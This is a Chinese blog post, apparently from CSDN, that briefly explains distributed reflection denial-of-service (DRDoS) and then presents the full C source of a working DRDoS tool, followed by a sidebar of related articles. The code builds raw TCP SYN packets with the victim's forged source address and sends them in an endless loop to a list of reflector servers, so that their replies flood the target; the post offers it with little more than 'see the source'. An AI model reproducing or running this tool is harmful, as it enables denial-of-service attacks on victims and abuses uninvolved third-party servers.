DRDoS软件的C源代码

最新推荐文章于 2024-09-11 22:20:30 发布
最新推荐文章于 2024-09-11 22:20:30 发布
阅读量2.8k 收藏 4
点赞数
分类专栏: 网络协议编程-攻击和网络驱动 文章标签: c random list tcp socket numbers
这是DDoS攻击的变形,它与DDoS的不同之处就是DrDoS不需要在实际攻击之前占领大量的傀儡机。这种攻击也是在伪造数据包源地址的情况下进行的,从这一点上说与Smurf攻击一样,而DrDoS是可以在广域网上进行的。其名称中的"r"意为反射,就是这种攻击行为最大的特点。黑客同样利用特殊的发包工具,首先把伪造了源地址的SYN连接请求包发送到那些被欺骗的计算机上,根据TCP三次握手的规则,这些计算机会向源IP发出SYN+ACK或RST包来响应这个请求。同Smurf攻击一样,黑客所发送的请求包的源IP地址是被害者的地址,这样受欺骗的计算机就都会把回应发到受害者处,造成该主机忙于处理这些回应而被拒绝服务攻击。
废话不多说了,大家看源码吧!


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netdb.h>

#define IPHDRSIZE sizeof(struct iphdr)
#define TCPHDRSIZE sizeof(struct tcphdr)
#define PSEUDOHDRSIZE sizeof(struct pseudohdr)

struct pseudohdr
{
unsigned long saddr;
unsigned long daddr;
char useless;
unsigned char protocol;
unsigned short length;
};
struct forcksum
{
struct pseudohdr pseudo;
struct tcphdr tcp;
};

unsigned short in_cksum(unsigned short * addr,int len);
int main(int argc,char * argv[]);

int main(int argc,char * argv[])
{
int val;

char fname[1000];
FILE * list;

char * packet;
struct iphdr * ip;
struct tcphdr * tcp;
struct forcksum helpcksum;

int serverfd;
struct sockaddr_in server;

char saddr[100],daddr[100];
unsigned short a,b,c,d,sport,dport,tport;

if (argc != 3)
{
printf("/nDistributed Reflection DoS tool - v1.0/n");
printf("Copyright (C) 2003 KrystalEye.com/n/n");
printf("Usage: %s <list> <target IP>/n/n",argv[0]);
printf(" -list : Path to Zombies (/"Reflection Servers/") list file/n");
printf(" -target IP: IP address of target/n/n");
printf("*** Syntax of list file ***/n");
printf(" -Each line contains 1 zombie's information/n");
printf(" -Each zombie is described by 5 numbers:/n");
printf(" 4 octets of IP address (without '.') and Port number/n");
printf(" -Numbers are seperated by at least 1 blank character (' ')/n");
printf("Example: 203 162 56 78 80/n");
printf(" => IP: 203.162.56.78 || Port: 80/n/n");
printf("Email: ngmnhat@yahoo.com/n");
printf("Good luck! Thanks for using this tool!/n/n");
exit(-1);
}
else
{
sprintf(fname,"%s",argv[1]);
sprintf(saddr,"%s",argv[2]);
sprintf(daddr,"%s",argv[2]);
tport = random() % 10000;
sport = tport;
dport = tport;
}

if ((packet = (char *)malloc(IPHDRSIZE + TCPHDRSIZE)) == NULL)
{
printf("Error: malloc()/n");
exit(-1);
}

bzero(packet,sizeof(packet));
bzero(&helpcksum,sizeof(helpcksum));

ip = (struct iphdr *)packet;
tcp = (struct tcphdr *)(packet + IPHDRSIZE);

helpcksum.pseudo.saddr = inet_addr(saddr);
helpcksum.pseudo.daddr = inet_addr(daddr);
helpcksum.pseudo.useless = 0;
helpcksum.pseudo.protocol = IPPROTO_TCP;
helpcksum.pseudo.length = htons(TCPHDRSIZE);

tcp->source = htons(sport);
tcp->dest = htons(dport);
tcp->seq = htonl(random());
tcp->ack_seq = 0;
tcp->doff = 5;
tcp->fin = 0;
tcp->syn = 1;
tcp->rst = 0;
tcp->psh = 0;
tcp->ack = 0;
tcp->window = htons(65535);
tcp->urg_ptr = 0;
tcp->check = 0;
helpcksum.tcp = *tcp;
tcp->check = in_cksum((unsigned short *)&helpcksum,TCPHDRSIZE + PSEUDOHDRSIZE);

ip->ihl = 5;
ip->version = 4;
ip->tos = 0;
ip->tot_len = IPHDRSIZE + TCPHDRSIZE;
ip->id = random();
ip->ttl = 255;
ip->protocol = IPPROTO_TCP;
ip->saddr = inet_addr(saddr);
ip->daddr = inet_addr(daddr);
ip->check = 0;
ip->check = in_cksum((unsigned short *)ip,IPHDRSIZE);

if ((serverfd = socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) < 0)
{
printf("Error: socket()/n");
exit(-1);
}

setsockopt(serverfd,IPPROTO_IP,IP_HDRINCL,&val,sizeof(int));

bzero(&server,sizeof(struct sockaddr));
server.sin_family = AF_INET;

if ((list = fopen(fname,"r")) == NULL)
{
printf("Error: cannot open file/n");
exit(-1);
}
fscanf(list,"%hu",&a);
if (feof(list))
{
printf("Error: empty list/n");
fclose(list);
exit(-1);
}
fclose(list);

printf("/nAttacking %s.../n/n",argv[2]);
printf("Press <Ctrl-C> to Stop./n");

while (1)
{
list = fopen(fname,"r");

while (!feof(list))
{
fscanf(list," %hu %hu %hu %hu %hu",&a,&b,&c,&d,&tport);

sprintf(daddr,"%hu.%hu.%hu.%hu",a,b,c,d);

helpcksum.pseudo.daddr = inet_addr(daddr);

ip->daddr = inet_addr(daddr);
ip->id = random();
ip->check = 0;

dport = tport;

tcp->source = htons(random() % 10000);
tcp->dest = htons(dport);
tcp->seq = htonl(random());
tcp->check = 0;
helpcksum.tcp = *tcp;

tcp->check = in_cksum((unsigned short *)&helpcksum,TCPHDRSIZE + PSEUDOHDRSIZE);
ip->check = in_cksum((unsigned short *)ip,IPHDRSIZE);

server.sin_addr.s_addr = inet_addr(daddr);
server.sin_port = htons(dport);

sendto(serverfd,packet,ip->tot_len,0,(struct sockaddr *)&server,sizeof(struct sockaddr));

usleep(100);
}

fclose(list);
}

close(serverfd);
return 0;
}

unsigned short in_cksum(unsigned short * addr,int len)
{
register int sum = 0;
u_short answer = 0;
register u_short * w = addr;
register int nleft = len;
while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}
if (nleft == 1)
{
*(u_char *)(&answer) = *(u_char *)w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return answer;
}
iiprogram
关注
专栏目录
2020最全详解DDoS的攻击原理与防御方法
weixin_48720927的博客
07-03 2231
DoS是Denial of Service的简写就是拒绝服务,而DDoS就是Distributed Denial of Service的简写就是分布式拒绝服务,而DRDoS就是Distributed Reflection Denial of Service的简写,这是分布反射式拒绝服务的意思。 不过这3中攻击方法最厉害的还是DDoS,那个DRDoS攻击虽然是新近出的一种攻击方法,但它只是DDoS攻击的变形,它的唯一不同就是不用占领大量的“肉鸡”。这三种方法都是利用TCP三次握手的漏洞进行攻击的,所以对它们的
PTES-情报搜集
03-12 366
PTES-情报搜集
ddos***
weixin_33672109的博客
03-02 80
#include <winsock2.h> #include <Ws2tcpip.h> #include <stdio.h> #include <stdlib.h> #define SEQ 0x28376839 #define NUM 7//反射服务器的个数 #define FAKE_IP "192.168.0.6"...
审核Memcrashed Drdos攻击代码
li123128的博客
03-18 503
0x00前言:距离世界上最大的Drdos攻击已经过去了两个星期左右昨天在交流的时候。群友在Github中找到了exploit。0x01开始:#-- coding: utf8 --#!/usr/bin/env python3import sys, os, time, shodan #导入sys,shodan,os,time模块from pathlib import Path #从pathlib模块中...
DR-DOSDigital Research-Disk Operating System)是數位研究公司
weixin_40191861的博客
10-16 89
Digital Research-Disk Operating System)是(Digital Research,很多人都和(Digital Equipment Corporation, DEC)混淆,其實兩家公司完全沒有關係)开发的,最初用于上的一种。主要支持。从1990年代PC机广泛使用开始,DR-DOS系统被逐步被取代。到1995年全面采用时,DOS的影响开始减小,DR-DOS也随之在桌面市场迅速衰落。1999年,DR-DOS推出7.03版本,随后在一段时间内一直未有正式更新。
DRDOS,Novell DRDOS,Calder DRDOS, Real32 DOS 多用户多任务操作系统使用心得
weixin_45707491的博客
11-19 1055
眨眼一看,哇!怎么这么多乱七八糟的DOS。是啊,不光是DOS白道上乱,DOS黑道上也是病毒丛生,互相抄袭、互相攻击。现在的黑客勒索,好赖还知道要钱,那时的黑客就是破坏,经常是损人不利己,连点儿规矩也没有,比黑帮还差。好了,我简单说一下安装方法吧(我是在实体机T810主板,带一个ISA槽,特意留在手里的宝贝机哈)。 1. 先去下载REAL32 7.94 在WinWorld去找,那地方有,有全系列MS-DOS,全系列DRDOS,还有CPM等多用户多任务的DOS,其中就包括 REAL32。这古懂有软件没用户手
探索高效验证工具:DrTLA+ 深入解析与实践
gitblog_00046的博客
04-12 228
探索高效验证工具:DrTLA+ 深入解析与实践 项目地址:https://gitcode.com/tlaplus/DrTLAPlus 在软件工程中,确保系统正确性的重要性无需赘言。DrTLA+ 是一个基于 TLA+ 的形式化验证工具,它由著名计算机科学家 Leslie Lamport 开发,旨在帮助开发者检测和预防潜在的设计错误。本文将深入探讨 DrTLA+ 的技术原理、应用领域及其独特优势。 ...
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1211
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
计网简简单单复习一下
最新发布
weixin_43739821的博客
09-11 1105
计算机网络基础 HTTP TCP IP ARP PING WebSocket 网络攻击 CDN 跨域
Linux命令行与shell脚本编程大全第三版 学习笔记
everest_33的博客
03-18 746
Linux自己的文件资料: /usr/share/doc (在你的Linux系统中)  https://www.osyunwei.com/archives/290.html 0.注意Linux中一切皆文件,本文中的文件指的是广义的文件,包括文件、目录、硬件设备 等等。 1. 初识Linux shell 1.1, Linux分为四个部分:Linux内核,GNU工具集,图形化桌面环境,应用软件 1.1.1, Linux内核主要负责四种功能:系统内存管理,软件程序管理,硬件设备管理,文件系统管理 ...
drdos8.1启动盘
01-17
drdos8.1启动盘,相当不错的一个DOS系统! 喜欢的快下载吧!
r2dr2-udp-drdos-tool:DRDoS UDP放大工具
05-24
r2dr2-udp-drdos工具 UDP放大DRDoS工具(BETA) 创建DRDoS UDP放大攻击的简单应用程序。 特征 允许对公共src地址进行IP欺骗。 通过引入十六进制有效载荷,允许利用多重服务。 经验证的与协议的兼容性:Citrix ICA,SIP,NTP,CharGEN。 允许可配置的多线程系统。 允许在同一二进制文件上旋转系统(打开9000 / udp端口)。 请阅读以下项目的评论(包括示例视频): 西班牙语: : 英文: : 要求 .NET Framework v4.5.1(较旧的版本可能会导致崩溃) WinPcap v4.1.3 不在具有活动BCP 38入口过滤功能的网络上(仅当您想要欺骗公共IP时)。 64位操作系统。 用法 配置并加载JSON配置文件(请参阅Binary文件夹中的示例)。 选择您要使用的接口。 点击“ Empezar”
DOSDOS攻击、DDOS攻击、DRDOS攻击
热气球
04-16 1331
DOS:中文名字是拒绝服务,一切引起DOS行为的攻击被称为DOS攻击。该攻击的效果是使得计算机或者网络无法提供正常的服务。常见的DOS攻击有针对计算机网络带宽和连通性的攻击。DOS是单机与单机之间的攻击。 DOS攻击的原理:首先攻击者向被攻击的服务器发送大量的虚假IP请求,被攻击者在收到请求后返回确认信息,等待攻击者进行确认,(此时需要拥有HTTP协议工作方式和tcp三次握手的基本知识)该过程需要...
NTP 相关信息整理 & DRDoS
这个博客,写给十年后的自己......
05-10 4856
部分参考自: 浅谈基于 NTP 的反射和放大攻击 这个是搭建服务器和一些讲解:NTP反射型DDos攻击FAQ/补遗 协议字段讲解 集美大学 关于警惕近期多发NTP反射放大攻击的预警通报 如何发现 NTP 放大攻击漏洞 NTP 工作原理详解 如何发现 NTP 放大攻击漏洞 Linux被DDOS&CC攻击解决实例 浅析各类DDoS攻击放大技术 NMAP扫描UDP123
8 Best DDoS Attack Tools (Free DDoS Tool Of The Year 2019)
weixin_30871905的博客
06-14 362
#1) HULK Description: HULK stands for HTTP Unbearable Load King. It is a DoS attack tool for the web server. It is created for research purposes. Features: It can bypass the cache engine. It...
DoS、DDos以及DRDoS攻击手段和防范措施
wenjianfeng的专栏
05-11 7169
 DoS   DoS(Denial of Service,拒绝服务攻击),它的原理很简单,就是用我们手里的机器去给服务器发请求,如果我们手头的服务器各方面性能都比服务器的主机的性能好,那么当我们发送大量请求给服务器,占用服务器的资源,导致服务器没有能力去处理其他用户请求。   为了加深大家的理解,我就详细介绍DoS攻击中最有名的实现方式:Syn-Flood攻击。在具体介绍之前,我先和大家温故一...
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 9051
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
smart drdos下载
08-21
Smart DRDoS通常使用多个攻击者的计算机作为源IP地址,并发送特定的请求到反射服务器上。反射服务器会将响应发送回源IP地址,但由于响应比请求更大,因此目标服务器将受到多倍于实际攻击流量的冲击。这导致目标...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值